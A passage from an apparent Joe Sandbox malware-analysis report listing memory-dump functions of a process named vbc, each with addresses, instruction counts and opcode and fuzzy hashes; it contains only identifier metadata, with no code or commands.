                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 15421b1081a15bdabe73940ece1e311422a38aedc6dbccfd08e6a45e523e3048
                                                                                                                                                  • Instruction ID: 396d44061e59b66b6877dbd118cb446655d5a6afcedadf07325ac22bfbbabb16
                                                                                                                                                  • Opcode Fuzzy Hash: 15421b1081a15bdabe73940ece1e311422a38aedc6dbccfd08e6a45e523e3048
                                                                                                                                                  • Instruction Fuzzy Hash: 14F0ECB1619A9A9FC722DB18C1C8F62B3E9FB017B0F099C66D81687D12C264DD80CA5C
                                                                                                                                                  Function 05C82619 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                  • Instruction ID: 23967e5377927263e759b679a69d7839eba151a4f1a2b6f1be795ef9b50334e1
                                                                                                                                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                  • Instruction Fuzzy Hash: 74E0D8723006406BD722AE998CC8F67776EEFC6B14F04087DB9045F251CAE6DD0982A4
                                                                                                                                                  Function 05C7CF80 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                                                                                  • Instruction ID: 3e5f59f368710486a2519da10803ac8c10999b9a5a07a16602bdadbb69d24f1c
                                                                                                                                                  • Opcode Fuzzy Hash: 0f2503cf4af7cb7b09027b56ae64a80349c60eadc7eba6a9026732afcc48f9fb
                                                                                                                                                  • Instruction Fuzzy Hash: D9F0E23230410AEFDB01AA56E804E9EFB7AFF81750F044412F9148B210D771A861CB10
                                                                                                                                                  Function 05CD6030 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                  • Instruction ID: cce4fcdb1ba8cd22c74e417417a0e5af530a5e73c82a5414b5adf2f4452fece6
                                                                                                                                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                  • Instruction Fuzzy Hash: 3EF030721542049FE3219F46D944F52FBE9EB05364F45C429E709DB560D379FC80CBA8
                                                                                                                                                  Function 05C40710 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                  • Instruction ID: 34d210233ee7b0c534f6a69f08bc88c53d8b057457dd7152eb2f9b35a2909e3d
                                                                                                                                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                  • Instruction Fuzzy Hash: 3AF0E5393043449BDB19DF16C048EA67BB9FB41360B000C58ED428B300D735EAC1CF85
                                                                                                                                                  Function 05C3EC20 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                                                                  • Instruction ID: 2460cf3c8ba83cc88d378bbee36a62acdb81d5b743f4f6229fb70e1ac9809a3e
                                                                                                                                                  • Opcode Fuzzy Hash: 996ac50646acec401b5b4ec6e6a79d216cdcf7e2fbd334b6c0b4cd53c06c704f
                                                                                                                                                  • Instruction Fuzzy Hash: 69F0303120428CAFEF18DB06E54AF293B9DFB44728F048919F8199A1A2C775D984DB55
                                                                                                                                                  Function 05CE678E Relevance: .0, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                  • Instruction ID: 5b33459a3fa8d6f6a5edf3ef33ad3ba70ad82e3a180df1230c66a30060b7d34a
                                                                                                                                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                                                                                  • Instruction Fuzzy Hash: CCE0DF32A00114BBDB2297998D09F9ABABCEBA4EA4F060465BA01E7090D570EE80D690
                                                                                                                                                  Function 05D14164 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7edd3aad1b5a688474f0648a213d06443eebddabc4d2fd31cd846c1b4503dd9d
                                                                                                                                                  • Instruction ID: 8be4faf5a46924683c053ac0925a514539bc19ea5c56ae2248c7225d5cd9add0
                                                                                                                                                  • Opcode Fuzzy Hash: 7edd3aad1b5a688474f0648a213d06443eebddabc4d2fd31cd846c1b4503dd9d
                                                                                                                                                  • Instruction Fuzzy Hash: B0F030319275915FDB61DB28F544F6673E5BB11730F1A0996DC4987911C724ECC0C658
                                                                                                                                                  Function 05C78EF5 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 47e1267f1a7c01cd615d525d9093d9430a1bcb09f456e0ba2f85e9d2adf68fe5
                                                                                                                                                  • Instruction ID: d8c17884cd3a2bd7ae62971804d821c1d3a6c9531da0602aff6ca06dc09592c6
                                                                                                                                                  • Opcode Fuzzy Hash: 47e1267f1a7c01cd615d525d9093d9430a1bcb09f456e0ba2f85e9d2adf68fe5
                                                                                                                                                  • Instruction Fuzzy Hash: 8AE09B3C73F5584BCF314F24A5187683B937B01694B495899E655DBF03C625D903E640
                                                                                                                                                  Function 05C425E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: ac21478b11ed5c1be283f13c115bc86beca1d584ca8cced200f93173877640dc
                                                                                                                                                  • Instruction ID: 3df7a55c17bc0096e7ab4ad417b7ae5f038e4474c7d500275bc539221dbf08ee
                                                                                                                                                  • Opcode Fuzzy Hash: ac21478b11ed5c1be283f13c115bc86beca1d584ca8cced200f93173877640dc
                                                                                                                                                  • Instruction Fuzzy Hash: ECE09232200594ABC712BF29DD0AF9A7B9AEF507A4F114925B11557190CB30AC50DBD8
                                                                                                                                                  Function 05CFA456 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                  • Instruction ID: e34e9a6c868f8775cf95f16f4797aafc1316ae7160e5378bb804f4ce2b0d52c3
                                                                                                                                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                                                                                  • Instruction Fuzzy Hash: 13E06535110A50DBD7766F26CC4CB62BBE0FF40B51F188C29A09B018B0C7B5A9C0EB40
                                                                                                                                                  Function 05CC4000 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                  • Instruction ID: 75080904b3bf600b7c47040fc1f9d2e8eebfe90f6bf67146836d1ee67c67703e
                                                                                                                                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                  • Instruction Fuzzy Hash: AAE0C2343443058FDB19CF19C090B627BB6BFD5A11F28C4A8E8498F205EB32E942CB40
                                                                                                                                                  Function 05C3823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                  • Instruction ID: b1addfa40eb33ee2d3efd7adab7f3492fa2a8e43a30d06fa414b9f3a06fb8771
                                                                                                                                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                  • Instruction Fuzzy Hash: 0AE08C31206A14EFDB316E22DC09F7176A2FB44B60F254D29F082060A486B6AC81EA44
                                                                                                                                                  Function 05C38C8D Relevance: .0, Instructions: 21COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                                                                  • Instruction ID: 1c1cc9b89fba6adc8541f0d523831f05b2fe8bcb60ff18cca97b9e4b7e1a0fd6
                                                                                                                                                  • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                                                                                                                                  • Instruction Fuzzy Hash: DAE08631103664EEDB316F12ED09F6276A2BB40F54F104C29B002054B08678AC95D645
                                                                                                                                                  Function 05C42050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 18d219166a29d14401023a2c23731226b7a8d1b756b29d49bd744f3cb8812d23
                                                                                                                                                  • Instruction ID: c14b00321fd2df8af858c1ff50e9c22065904b01ad2df7368fd8adc7a9f9fabb
                                                                                                                                                  • Opcode Fuzzy Hash: 18d219166a29d14401023a2c23731226b7a8d1b756b29d49bd744f3cb8812d23
                                                                                                                                                  • Instruction Fuzzy Hash: DCE08C322004906BC712FE5DDD41F8A779EEFA46A0F100621B15087290CA20AC40DBA8
                                                                                                                                                  Function 05CF6ED0 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                                                                  • Instruction ID: 6d56c92fb3c3da58bce089ff680786ab6e56b9641174eac2b7e0ae21aa3fb234
                                                                                                                                                  • Opcode Fuzzy Hash: 060d296e8d26ecb49ad336c8a787268f93ccbb25a937a2f458a648f6d28e60a5
                                                                                                                                                  • Instruction Fuzzy Hash: 0BD02E2A14C2C483CA92898A80607F63F2F5742F04F28247CC2460FA02CA0749C3E32A
                                                                                                                                                  Function 05C7E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                  • Instruction ID: 64adee0a8eeb7a0d84d49b07f5af0f4f0e12e5adc4ca905d17f47b364eb57167
                                                                                                                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                  • Instruction Fuzzy Hash: 5DD0A7326045505BDB319A1CFC04FD333D9BB48760F150859B104C7150C360AC81C644
                                                                                                                                                  Function 05C3A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                  • Instruction ID: 7376b44768badb5a8c4a806eb0517ca329831a58c5d2e5f92cbdbe69cc021c9a
                                                                                                                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                  • Instruction Fuzzy Hash: 22D0123231607497CB299A96AD14FA77A16EB85AE4F1A096D780B93900C5158C92E6E0
                                                                                                                                                  Function 00407B22 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_vbc.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5582fae134d6297e600747d5c34705544d139883d56a19fec24480b5087df594
                                                                                                                                                  • Instruction ID: 7517476f6bc05733407f907106427a49856b4d1bbda0f19ccce0d3bce6ca9612
                                                                                                                                                  • Opcode Fuzzy Hash: 5582fae134d6297e600747d5c34705544d139883d56a19fec24480b5087df594
                                                                                                                                                  • Instruction Fuzzy Hash: AAC09B3691B10515E5141D4DF4402F4F37AD753679F40329BD905A75015553D4550389
                                                                                                                                                  Function 05C7CF50 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fcc0d9aa13ea9b6b6966241860a24847031e3c9ba13c57cfd37d2841713c3966
                                                                                                                                                  • Instruction ID: 0ebc543bcb9d74d493d1aca4944449ee1e84f80909405befb245df49d2f11605
                                                                                                                                                  • Opcode Fuzzy Hash: fcc0d9aa13ea9b6b6966241860a24847031e3c9ba13c57cfd37d2841713c3966
                                                                                                                                                  • Instruction Fuzzy Hash: EAD0A732110144ABC702FF48CD41F453B6AEB94790F000430B40447221CA30FC60DA58
                                                                                                                                                  Function 05C502A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                  • Instruction ID: a314b27d540aaec0af9477ad6e8238be1b878884bb2c60ab4184545a2ddc8447
                                                                                                                                                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                  • Instruction Fuzzy Hash: 38D0C935216E81CFD62ACB4DC9A8F1573A5FB44B48FC10890E802CBB21D66CEA80CA04
                                                                                                                                                  Function 05C7CF1F Relevance: .0, Instructions: 13COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a33de908327e7be42777a4f97fe01f81d38221f0b3b08d1aab573d17aeadb48c
                                                                                                                                                  • Instruction ID: 65dfefdb38c99e404397e6f8e89747b80a37997f9cb16cc471e031ca6346910e
                                                                                                                                                  • Opcode Fuzzy Hash: a33de908327e7be42777a4f97fe01f81d38221f0b3b08d1aab573d17aeadb48c
                                                                                                                                                  • Instruction Fuzzy Hash: 60D05E72121440EFD726CB08C946F2577A4F700B44F4545B8A0068B920C728E900DB44
                                                                                                                                                  Function 05C7C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                  • Instruction ID: 2d0710cc187eead7c5572337d2195a733d6b4eaeb7f458025abe5c4f56465f11
                                                                                                                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                  • Instruction Fuzzy Hash: 13C01232250644AFC7119E94CD01F0177A9E798B90F100421F60447570C531F850E644
                                                                                                                                                  Function 05C60310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                  • Instruction ID: 7d67362d5406408e9b0ab5542a0e5fa14be85dde5c0430ef21a2fb511d4e9630
                                                                                                                                                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                  • Instruction Fuzzy Hash: 68D01236200288EFCB05DF41C894D9A772AFBC8710F109419FD19076108A31ED62DA50
                                                                                                                                                  Function 05C40750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                  • Instruction ID: e587f5ccc99de7b22c095c3ba163f47d5c9f7f8dc20d86cbb5fa91ade93433c6
                                                                                                                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                  • Instruction Fuzzy Hash: A5C08838300A808FCF08CF2AC288F0833F8FB00B80F000C80E802CBB20E228E800CA00
                                                                                                                                                  Function 05CF6F00 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                                                  • Instruction ID: b3d4f77a998e5318192812f5bc3f605886e9c8afb32416f408666fbf6d89aada
                                                                                                                                                  • Opcode Fuzzy Hash: e0308ce5ee14c24fb886fb9f14b489cdec504b92c80768c2a23305a5c2b521e7
                                                                                                                                                  • Instruction Fuzzy Hash: 96C09B2F1556C149CD178F3553127E4BF61D7425D4F5D14C5D4D11F513C1144653D725
                                                                                                                                                  Function 05D14DAD Relevance: .0, Instructions: 6COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                                  • Instruction ID: 8e318948ef0d19a9e84d8ba7d78fbed1e654c9886ed0682395363e187699078c
                                                                                                                                                  • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                                  • Instruction Fuzzy Hash: 65B01232312544CFC7026720CB44F1833A9BF017D0F0904F0650089831D6188A10F501
                                                                                                                                                  Function 05C84650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
